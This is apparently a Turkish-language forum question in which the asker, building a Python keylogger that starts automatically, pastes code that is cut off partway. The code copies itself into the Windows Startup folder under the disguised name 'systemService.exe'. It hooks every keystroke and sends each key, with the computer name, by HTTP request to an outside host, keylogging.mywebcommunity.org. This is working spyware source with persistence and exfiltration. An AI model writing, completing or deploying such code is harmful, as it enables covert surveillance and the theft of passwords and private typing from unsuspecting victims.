0
Python Keylogger
Başlangıçta otomatik olarak çalışan bir python keylogger yapmaya çalışıyorum. İşte python kodu import pyHook, pythoncom, os, httplib, urllib, getpass, shutil, sys userName = getpass.getuser() filePath = "C:\users\%s\AppData\Roaming\Microsoft\windows\Start Menu\Programs\Startup\\" %userName if os.path.exists(filePath): if os.path.isfile(filePath+'systemService.exe')==False: try: shutil.copy2(sys.argv[0],filePath+'systemService.exe') except: pass def OnKeyBoardEvent(event): try: params = urllib.urlencode({'pcName': os.environ['COMPUTERNAME'], 'toLog': chr(event.Ascii)}) conn = httplib.HTTPConnection("keylogging.mywebcommunity.org") conn.request("GET","/index.php?"+params) …